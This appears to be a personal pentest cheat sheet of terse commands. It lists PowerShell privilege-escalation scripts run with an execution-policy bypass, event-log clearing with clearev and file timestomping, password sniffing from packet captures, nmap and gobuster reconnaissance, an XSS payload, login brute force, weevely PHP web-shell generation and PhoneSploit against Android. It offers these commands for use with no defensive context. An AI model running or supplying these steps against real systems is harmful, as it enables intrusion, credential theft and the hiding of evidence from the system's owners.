xtra_pins_to_pentest_checklists_20222
To be added
25 November 2022 15:35
Execute PowerShell scripts to get VNC, to bypass AV detection and to get privilege escalation:
Upload <path> PowerUp.ps1
powershell -ExecutionPolicy Bypass -Command ". .\PowerUp.ps1;Invoke-AllChecks"
Upload Beroot.exe to get highest privilege
clearev is used to clear the logs
timestomp secret.txt -m <"modified Value in the same format">
tcpdump -nvx -i <interface mode> port 8888 // execute this command on the receiving side to monitor the network
To look for logged-in user passwords in a pcap file, use the display filter: http.request.method == "POST"
OR
Click Edit --> Find Packet --> [Packet details, Narrow (UTF-8 / ASCII), String, pwd]. Expand "HTML Form URL Encoded" to get the details
ANTI DOS Guardian can be used
Ghost Eye footprinting tool
nc -vv <url> 80
telnet <url> 80
nmap -sV --script=http-enum <Domain>
nmap --script hostmap-bfk --script-args hostmap-bfk.prefix=hostmap- <url>
<script>alert(1)</script>
whatweb <domain>
nmap -T4 -A -v <Domain>
After performing RCE do RDP using added credentials
Directory Listing:
gobuster dir -u <http://<url>> -w <Wordlists.txt>
During login brute force use the cluster bomb attack
weevely generate <Pass> <Path.php>
weevely <path.php> <Pass>
Android
apt-get install adb
git clone phonesploit
3
<type IP>
4
Exit (To exit from the shell)